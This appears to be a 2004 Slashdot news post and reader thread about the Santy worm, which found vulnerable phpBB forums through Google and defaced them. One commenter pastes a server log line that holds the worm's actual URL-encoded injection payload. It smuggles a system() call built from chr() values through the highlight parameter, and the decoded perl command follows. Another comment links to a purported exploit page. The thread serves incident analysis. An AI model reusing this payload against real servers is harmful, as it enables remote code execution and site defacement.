Net Worm Uses Google to Spread

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

Under the Google radar

[Meostro]

I saw this yesterday on a.... uhh... "anatomic reference" site:
This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

I tried to find some kind of reference and Googled [google.com] for it, but I got no results.

Still nothing on it, wonder how long it'll be before it shows up?

MSN search [msn.com] returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta [msn.com] engine for the article.

I got hit HARD! :(

[Broadband]

This worm is unbelieveably evil.

What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

-BB

Re:NeverEverNoSanity

[Anonymous Coward]

That is only part of it. All the sites in MSN search are IIS sites. IIS actually sends info to MSN search (Wehter you want it to or not). While IIS has a small % of the web, it is still some 20%.

Re:A few things..

[psyon1]

No, as someone else already responded to other posts, it is a phpBB problem. phpBB calls the urldecode() function on form variables, after PHP already does so. It allows ' to bypass the magic quotes that php so lovingly puts on all our form data. The latest bug reports were reported after the release of the exploit for phpBB 2.0.10 and earlier. IIRC the report said that some scripts MAY be vulnerable, but didnt state for certain. As far as I know, no one has yet to release an exploit for the bugs, its just a possibility.

Re:Quick!

[geekopus]

It might be quite the opposite:

When I copied all these entries out of the log and translated the chr()
calls, they turned out to be the attached perl script, which is capable
of finding .html files to deface, and then going to google and finding
more instances of phpbb to infect.

This is from one of the links above. So, it sounds like if a machine doesn't have Perl installed, the thing can't go to work. By sheer coincidence, most windows boxes will be immune to this particular instance of this worm (by not having Perl installed).

That's not to say that it can't be modified to carry a more portable payload. Thank god the payload wasn't itself written in PHP.

This one's fun to debug - perl via url

[falzbro]

I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

Here's the first line from the logfile:

[20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

If you decode the ascii characters [asciitable.com], you get:

perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

--falz

Worm's genealogy?

[Azul]

Searching for "neverevernosanity webworm generation X" on MSN Beta Search [msn.com] yields the following number of results for each value of X:

1: 0
2: 0
3: 0
4: 2335
5: 9297
6: 7218
7: 7288
8: 10746
9: 12009
10: 11752
11: 14866
12: 13267
13: 8393
14: 13317
15: 3840
16: 5004
17: 2032
18: 3344
19: 7
20: 1
21: 3
22: 1
23: 1
24: 1
25: 0

Hmm, if these numbers are to be trusted, the infections are 10.5 generations old, on average.

Interestingly, these numbers add to 124k, much more than the reported 39k number of pages reported by merely searching for "NeverEverNoSanity". This would imply that many of the defaced pages contain messages for different generations. Weird.

It would be interesting if the defaced pages included the URL of the parent, the one that the worm used to infect the server from which it infected the current one.

Found this in my server logs

[Chatmag]

http://www.hackgeneral.net/phpbb_exploit.php

When I first saw that page a few days ago, it had several boxes for inputs, the site URL, code, and execute button. The page is now gone, and if someone speaks Spanish, please let us all know what the site is about.